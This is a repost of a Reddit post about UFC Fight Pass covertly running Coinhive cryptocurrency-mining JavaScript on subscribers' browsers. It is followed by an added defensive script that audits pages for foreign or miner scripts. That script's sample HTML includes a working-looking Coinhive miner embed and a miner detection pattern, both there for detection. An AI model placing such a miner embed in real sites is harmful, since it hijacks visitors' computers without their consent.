
UFC Fight Pass Tried To Exploit Paying Subscribers By Using Their PCs To Mine Crypto Currency


UFC Fight Pass is generally considered one of the more reputable streaming companies in the combat sports business, which is why it was so surprising when one subscriber noticed his CPU usage spiking as he browsed the programming.

As a reminder, UFC Fight Pass is home of the Eddie Bravo Invitational and many other programs and documentaries at a low price of $9.99 USD.

Gambledub, a known BJJ breakdowns author, noticed this first. He wrote:

I noticed this because my anti virus kept pinging off every time I went on Fight Pass. It’s not harmful AFAIK, but doing this on a service we’re paying for is fucked up imo. I researched Coin Hive (mentioned by my anti virus) and found the javascript on their website, and sure enough it’s running on Fight Pass.

Right after you log in. Notice the “Welcome” at the top left behind the anti virus notification…

Appears it’s been removed now. Still, this is really bad that they tried to do this.

EDIT: Damn, this blew up!

For all the people saying it was something on my end, such as an ad or browser plugin, here is a different screenshot from Twitter around the same time this thread was posted.

Here’s another tweet from 19 hours ago (at the time of editing) mentioning the same thing.

Here is u/boobloop mentioning it 6 hours before this thread was made in the daily discussion thread.

Look at this comment chain from earlier in the thread, where it was also found by /u/ThatGamingSupportGuy.

Or here, where /u/twoofseven also notices a CPU spike (more workload from PC components).

Important: It’s really worth pointing out that this isn’t an ongoing issue. Here, it was confirmed that it was removed by several users (10 hours before this edit, and well before the post blew up).

However, what we do know is that this was an issue for at least 9-10 hours before it was resolved.


Don’t Understand what was happening?

Your device or computer could have potentially been used to mine crypto currency (bitcoin is one you may have heard of, but not the one being mined in this case) while/if you had a Fight Pass tab open.

This can cause your CPU (on a computer) to work harder, costing more in electricity (although likely minimal amounts) or causing your battery to drain on a mobile device. It is likely that if you were mining you would see a negative impact on your performance, due to increased workload. It can also cost you more in electricity on a wired device (although minimal). There is also a slight potential that over time, increased strain on your electronic components leads to damage and shorter lives of said components.

So, what’s the problem?

Firstly, the UFC have not addressed this AT ALL. Despite having at least 20 hours of people telling them about it.

Secondly, there was no notification that data mining was happening. No option or consent to allow it, as it happened automatically, and judging by the “ELI5” posts, very little understanding of the ramifications by most people using the site.

Thirdly, this is a service that WE ALREADY PAY FOR! This is one of the big issues people are overlooking. If they want to mine currency off your computer instead of using advertisements or subscriptions, that is one thing. But if you are already paying for a Fight Pass subscription, you SHOULD NOT be paying extra to make someone else money. Even if it cost you 0.000001 cent, it is the principle.

Who did it? & why it is really important

At this point there are 3 people who could be responsible…

  • The UFC. (most unlikely)
  • A rogue employee/contractor of the UFC. (such as a web developer behind Fight Pass)
  • A hacker unaffiliated with the UFC.

Here’s the concerning thing. In the unlikely event this was intentionally done by the UFC, it is at best extremely unethical in many people’s opinions. At worst it is potentially illegal, as seen in the similar situation with ESEA where they were fined $1 Million.

However, even if it is not the UFC directly, it raises an additionally awkward question. How good are the security protocols if someone can do this? Think about it, for a site with access to people’s Facebook accounts and credit card information, the fact that this happened is not good.

Regardless of who did it, the UFC has to take at least part of the blame. The fact we have yet to hear ANYTHING from them is concerning at best.

As I typed this u/Jamester1 posted

I emailed UFC about this earlier this morning and they finally responded with this… “Thank you for contacting us on this issue. We take these matters very seriously, and will review this. UFC.TV Support”

How do I stay safe?

While it is extremely unlikely you suffered any damage or are at any enhanced risk from this incident, this is likely to become more commonplace over time with many sites, so learn to protect yourselves. There are some great responses to this comment by u/1cosha1 & u/totally_rocks about using UBlock and Antiminer to protect yourself which you should definitely check out.

Misconceptions

I’ve seen a few people mention Bitcoin mining; this is not the case in this example. Bitcoin tends to be more GPU intensive and doesn’t work very well relying on CPU power. Monero was likely the crypto currency being mined, which works better for CPU based setups.

Also worth noting, Monero has had a sharp increase in value over the last 24 hours. Potentially unrelated but worth pointing out.

Also a lot of people are blaming Coin Hive. As far as I can tell they are not compliant at all and seem to be getting blamed unfairly. They advise against using the software in this manner. They are like torrent sites, in that they have legitimate uses, but can be abused, which is what we’re seeing here. From what I understand, Coin Hive was designed to be an alternative to traditional web advertisements. Not as an additional profit supplement to advertising and/or subscription fees that we are seeing here.

source: reddit mma
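
An added example, not part of the original post or of any UFC code: a check a site owner could run over a rendered page to list script tags that load from origins outside an allowlist or that reference Coinhive, the miner named in the post. The sample HTML, the host names and the site key are constructed placeholders.

```javascript
// Matches the Coinhive script host and its JavaScript API name.
const MINER_RE = /coinhive/i;

// Constructed sample page (hypothetical hosts, placeholder site key).
const SAMPLE_HTML = `
<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-player.test/player.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER'); miner.start();</script>
</head><body>Welcome</body></html>`;

// Returns one finding per suspicious <script> tag:
//   miner-script    external script whose URL matches the miner indicator
//   unlisted-origin external script from a host not in allowedHosts
//   miner-inline    inline script whose body matches the miner indicator
function auditScripts(html, pageUrl, allowedHosts) {
  const findings = [];
  const tagRe = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  for (const [, attrs, body] of html.matchAll(tagRe)) {
    const srcMatch = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(attrs);
    if (srcMatch) {
      // Resolve relative paths against the page URL before comparing hosts.
      const url = new URL(srcMatch[1], pageUrl);
      if (MINER_RE.test(url.href)) {
        findings.push({ kind: 'miner-script', detail: url.href });
      } else if (!allowedHosts.includes(url.host)) {
        findings.push({ kind: 'unlisted-origin', detail: url.host });
      }
    } else if (MINER_RE.test(body)) {
      findings.push({ kind: 'miner-inline', detail: body.trim().slice(0, 60) });
    }
  }
  return findings;
}

// The first-party host is the only allowed script origin in this sample.
const report = auditScripts(SAMPLE_HTML, 'https://video.example.test/',
                            ['video.example.test']);
console.log(report);
```

The same allowlist, expressed as a `Content-Security-Policy` `script-src` directive on the site, makes the browser refuse the unlisted scripts instead of only reporting them.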